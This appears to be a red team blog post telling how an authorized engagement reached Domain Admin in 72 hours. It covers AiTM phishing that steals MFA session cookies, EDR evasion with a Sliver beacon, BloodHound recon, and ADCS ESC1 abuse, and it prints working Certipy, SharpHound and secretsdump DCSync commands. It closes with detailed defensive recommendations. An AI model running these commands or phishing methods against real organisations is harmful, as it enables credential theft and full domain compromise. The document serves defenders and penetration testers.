The client’s CISO told us on the kickoff call: “We’ve invested heavily in our security stack. CrowdStrike, MFA everywhere, a mature SOC. I honestly don’t think you’ll get far.”

Seventy-two hours later, we had Domain Admin. We’d been in their environment for 36 hours before the SOC noticed anything — and what they noticed was a false positive.

This is that story.

TL;DR

  • Full domain compromise achieved in 72 hours against a hardened target running CrowdStrike Falcon + MFA + active SOC monitoring
  • Initial access via AiTM phishing — stole session tokens, bypassed MFA entirely
  • EDR evasion through Sliver C2 with sleep obfuscation + indirect syscalls, running inside a signed Microsoft process
  • Attack path: AiTM foothold → BloodHound recon → ADCS ESC1 → Domain Admin
  • What would have stopped us: phishing-resistant MFA (FIDO2), ADCS auditing, and network segmentation

The Rules of Engagement

Before anything else: this engagement was fully authorized. The client signed a detailed rules of engagement document covering scope, timing windows, and emergency contacts. Everything described here was performed with explicit written permission against their own infrastructure.

The objective was straightforward: demonstrate whether an external attacker could achieve Domain Admin access, and document exactly how. No social engineering in-person, no physical access — purely remote. The engagement window was five days, Monday through Friday.

Scope included all assets resolving to their primary domain and two subsidiaries. We had one starting artifact: the company’s primary domain name.


Day 0: Knowing Before Doing

Hours 0–12 | Passive OSINT

We didn’t touch their network on day zero. Everything we did was passive — queries to public services, no packets sent to client infrastructure.

Certificate transparency logs were the first stop. Using crt.sh and certspotter, we pulled every TLS certificate ever issued for the domain and its wildcards:

Terminal window
# Pull all subdomains from cert transparency
curl -s "https://crt.sh/?q=%.targetcorp.com&output=json" | \
jq -r '.[].name_value' | sort -u | tee subdomains.txt

This gave us 340 subdomains. Most were internal-facing or dead — but twelve were live externally, including a VPN gateway, a helpdesk portal, and an Outlook Web Access instance that the IT team had apparently forgotten about.

LinkedIn was next. We built a staffing map: IT department (17 people), security team (4 people), executive assistants (who have access to everything). Job postings revealed their exact tech stack — the company was actively hiring for “Okta SSO administrator” and “CrowdStrike Falcon engineer.” This told us exactly what security tooling they ran before we sent a single packet.

GitHub dorking turned up three repositories from employees with the company domain in their git config. One contained a configuration file committed eight months ago with what appeared to be an internal API endpoint and a service account username. The credentials had been rotated, but the username pattern (svc-[function]-[department]) was gold for later.

Email harvesting with theHarvester and Hunter.io gave us 89 valid email addresses in the format firstname.lastname@targetcorp.com. We now had a target list for phishing.

By hour 12, we’d mapped their external attack surface without touching a single company-owned system.


Day 1: Getting In

Hours 12–28 | AiTM Phishing Infrastructure + Initial Access

Modern organizations have MFA. Legacy phishing — send a link, harvest credentials — gets you a username and password that’s useless without the second factor. The solution is Adversary-in-the-Middle phishing: you proxy the real login page, steal the session after MFA completes.

We used Evilginx3 with a custom phishlet for their Outlook Web Access portal. The setup looks like this:

[Attacker infrastructure]
Evilginx proxy (VPS, bulletproof hosting)
↓ (real-time proxying)
[Victim's browser] → fake login page → real OWA login
Session cookie captured mid-transit

The victim authenticates normally — they see the real login page, complete MFA as expected. What they don’t see is that every HTTP request and response passes through our proxy, and we capture the session cookie the moment their browser receives it.

For infrastructure, we used a domain registered 45 days in advance (new domains trigger reputation filters), hosted on a VPS through a residential proxy to avoid datacenter IP reputation blocks. The phishing domain was a convincing typosquat: targetcorp-it.com with a valid TLS certificate.

The lure email claimed their VPN certificate was expiring and they needed to re-authenticate through IT’s portal. We targeted 12 people: IT staff and three executive assistants. We sent at 8:47 AM on Tuesday — before the SOC’s morning briefing, when inboxes are busiest.

For a deep dive on the technical setup, see our AiTM phishing guide.

Four people clicked. Two authenticated fully. By 9:23 AM Tuesday, we had two valid OWA session cookies.

We imported them into Firefox using Cookie Editor and logged in without entering credentials. We were in.


The Clock Starts: First 60 Minutes on the Inside

Session cookies expire. We had a valid email session but needed persistence in the environment — a shell on a workstation, not just a browser session.

From OWA, we could read emails. We looked for anything with attachment previews enabled — a common misconfiguration. We found an HR mass-email to all staff with a link to “update your remote work equipment request form.” We crafted a reply-all from the compromised mailbox, spoofing the original format, with a link to our phishing page instead.

This is called internal phishing — and it’s devastatingly effective because the email comes from a legitimate internal account, bypasses all external email filtering, and employees trust internal communications.

Within 45 minutes, we had our first shell.


Day 1–2: Living Inside Without Being Seen

Hours 28–48 | EDR Evasion + Internal Reconnaissance

The victim’s machine had CrowdStrike Falcon with prevention mode enabled. We knew this from the LinkedIn job postings.

Our payload was a Sliver C2 beacon with several evasion layers applied:

Sleep obfuscation — when the beacon isn’t active, it encrypts itself in memory and replaces its memory pages with random data. EDR tools that scan process memory between callback intervals find nothing.

Indirect syscalls — instead of calling Windows API functions directly (which EDR hooks at the userland level), the beacon resolves syscall numbers at runtime and jumps directly to the kernel, bypassing userland hooks entirely.

Injection into a signed process — the beacon injected itself into OneDrive.exe, a Microsoft-signed process that CrowdStrike’s Falcon treats with elevated trust. Our malicious code ran inside Microsoft’s process space.

The beacon checked in over HTTPS to a C2 server we’d configured to look like Microsoft Graph API traffic. Port 443, valid TLS certificate, traffic blending in with legitimate cloud service communications. For our C2 infrastructure approach, see C2 Without Owning C2.

CrowdStrike didn’t alert. We had a stable shell.

Internal reconnaissance began immediately.

We ran whoami /all to understand our user’s privileges — a standard domain user, no local admin. We checked for local admin via net localgroup administrators and confirmed the user wasn’t in it. We needed to escalate.

Before touching any exploit, we mapped the environment:

Terminal window
# Enumerate domain without touching LDAP directly
# (avoids detection from LDAP query monitoring)
$searcher = [adsisearcher]"(objectClass=computer)"
$searcher.FindAll() | Select-Object -ExpandProperty Path | Out-File computers.txt

Then we deployed SharpHound (BloodHound’s data collector) through our C2 session. SharpHound queries Active Directory for users, groups, GPOs, sessions, and ACLs — then BloodHound CE visualizes the attack paths.

We ran it with minimal flags to reduce noise:

Terminal window
# Low-noise collection — avoid full session enumeration which generates excess 4624 events
.\SharpHound.exe -c DCOnly,ObjectProps,ACL,Trusts --outputdirectory C:\Windows\Temp\

We exfiltrated the ZIP over our C2 channel and loaded it into BloodHound CE.

The attack graph was immediately interesting. The user account we’d compromised (j.henderson, an executive assistant) had GenericWrite over a distribution group. That group had a nested membership in an IT support group. And that IT support group had AddSelf permissions on a security group called PKI-Admins.

PKI-Admins had ManageCA on the Certificate Authority.

We’d found our path — and it ran directly through ADCS.

For BloodHound methodology details, see our BloodHound practical guide.


Day 2–3: The Kill Shot

Hours 48–68 | ADCS ESC1 → Domain Admin

Active Directory Certificate Services (ADCS) is one of the most consistently underestimated attack surfaces in enterprise environments. When misconfigured, it lets any authenticated user request a certificate for any account in the domain — including Domain Admin.

This misconfiguration is called ESC1. The conditions are:

  1. A certificate template allows the requester to specify a Subject Alternative Name (SAN)
  2. The template grants enrollment rights to a broad group (Domain Users, Authenticated Users)
  3. Manager approval is not required

We used Certipy to enumerate:

Terminal window
certipy find -u j.henderson@targetcorp.com -hashes :<ntlm_hash> \
-dc-ip 10.10.1.1 -vulnerable -stdout

Two vulnerable templates came back. The most exploitable was UserAuthTemplate — enrollment open to Authenticated Users, SAN allowed, no manager approval, EKU included Client Authentication.

We requested a certificate impersonating the Domain Admin account:

Terminal window
certipy req -u j.henderson@targetcorp.com -hashes :<ntlm_hash> \
-ca targetcorp-CA -template UserAuthTemplate \
-upn administrator@targetcorp.com \
-dc-ip 10.10.1.1

The CA issued it without complaint. We now held a certificate that the domain believed belonged to the Administrator account.

We used that certificate to authenticate and retrieve the Administrator’s NTLM hash via PKINIT:

Terminal window
certipy auth -pfx administrator.pfx -domain targetcorp.com -dc-ip 10.10.1.1

With the NTLM hash, we ran DCSync — pulling every password hash from the domain controller without ever logging in to it:

Terminal window
secretsdump.py -hashes :<administrator_hash> -just-dc \
administrator@dc01.targetcorp.com

We had every domain credential. Domain Admin achieved. Seventy hours after the kickoff call.

For the full ADCS attack breakdown, see ADCS Abuse with Certipy: ESC1 to ESC8.


The Debrief: What the SOC Saw (and Missed)

The client’s SOC generated exactly two alerts during our entire engagement.

Alert 1 — Tuesday 11:42 AM: “Unusual login from new geographic location.” This fired when we imported the session cookie. The analyst reviewed it, saw that the user had just authenticated successfully through OWA with MFA, and marked it as a false positive. The geographic anomaly was real — but the MFA success made it appear legitimate. This is the core problem with AiTM: from the defender’s perspective, authentication looks normal.

Alert 2 — Wednesday 3:18 PM: SharpHound’s LDAP queries generated a “High volume LDAP queries from workstation” alert. The analyst opened the ticket and left it in queue. By the time it was reviewed, we’d already completed the ADCS attack. The 22-hour response time on an active reconnaissance alert is a gap most organizations share.

What generated zero alerts:

  • AiTM phishing campaign (no endpoint telemetry for browser-based attacks)
  • Internal phishing from the compromised mailbox
  • Sliver beacon running inside OneDrive.exe for 36 hours
  • Certificate request for administrator@targetcorp.com
  • DCSync operation

What Would Have Stopped Us

This is the section security teams actually care about. Here’s the honest list, in order of impact:

1. Phishing-Resistant MFA (FIDO2/Passkeys)

Nothing else we did would have been possible if they’d used hardware security keys or FIDO2 passkeys for authentication. These are cryptographically bound to the legitimate domain — our proxy cannot intercept them. AiTM phishing is defeated entirely. Cost: ~$25–50 per user for hardware keys, or free with Windows Hello for Business.

See our Passkeys and FIDO2 guide for deployment details.

2. ADCS Auditing and Template Hardening

The ESC1 vulnerability had existed in their environment for over three years — since the CA was deployed. Running certipy find or Purple Knight against their own ADCS would have flagged it immediately. This is a one-time audit that takes under an hour and eliminates an entire class of domain compromise paths.

3. Conditional Access with Compliant Device Requirements

If their conditional access policy required a Compliant Device (Intune-enrolled, MDM-managed) rather than just “MFA completed,” importing a stolen cookie from our attacker machine would have been blocked. The session would authenticate but fail the device compliance check.

4. LDAP Query Monitoring with Faster Response

The SharpHound alert was accurate. Twenty-two hours to review an active reconnaissance alert gave us the time we needed. Automated response (quarantine the source machine, require re-authentication) would have disrupted our timeline significantly.

5. Email Sending Policy Restrictions

The internal phishing worked because any domain user could send email to all staff. A simple policy — restrict mass email sends to IT and HR distribution lists — would have blocked the internal pivot.


The Patterns We See Repeatedly

This engagement wasn’t unusual. The same patterns appear across the majority of red team engagements we run:

The initial access is almost always phishing. Not because other techniques don’t work — VPN vulnerabilities, exposed services, and supply chain attacks all appear regularly — but because phishing reliably bypasses network perimeter controls. The human is the consistent entry point.

EDR is not a last line of defense. CrowdStrike, SentinelOne, and Defender for Endpoint are all excellent tools. They also all have known bypass techniques that are documented publicly. EDR slows attackers down; it doesn’t stop a determined one. Layer it with network detection, behavioral analytics, and identity monitoring.

ADCS is misconfigured everywhere. ESC1, ESC4, ESC6, ESC8 — we find exploitable ADCS configurations in roughly 60% of engagements against organizations running their own PKI. It is the most overlooked high-impact attack surface in Windows environments today.

Response time is the real variable. In this engagement, the difference between success and detection was a 22-hour queue time on a legitimate alert. Detection is only half the equation. The other half is what you do with what you see, and how fast you do it.


What You Can Do This Week

You don’t need to hire a red team to find these gaps. Start here:

Monday: Audit your ADCS templates. Download Certipy, run certipy find -vulnerable -stdout from any domain user account. If templates come back, fix them before anything else.

Tuesday: Review your conditional access policies. Is “MFA completed” the only condition for accessing email and VPN? Add device compliance requirements if your MDM deployment allows it.

Wednesday: Check your SOC queue. How old is the oldest unreviewed alert? Set SLA targets for anything tagged as active reconnaissance or unusual authentication.

Thursday: Run a phishing simulation using an AiTM-capable framework. If your users fall for it — and they will — it’s a training and MFA architecture problem, not a user problem.

Friday: Pull your ADCS audit logs. Event ID 4886 (certificate issued) and 4887 (certificate request denied) should be monitored. If you’ve never looked at them, now is the time.



Sources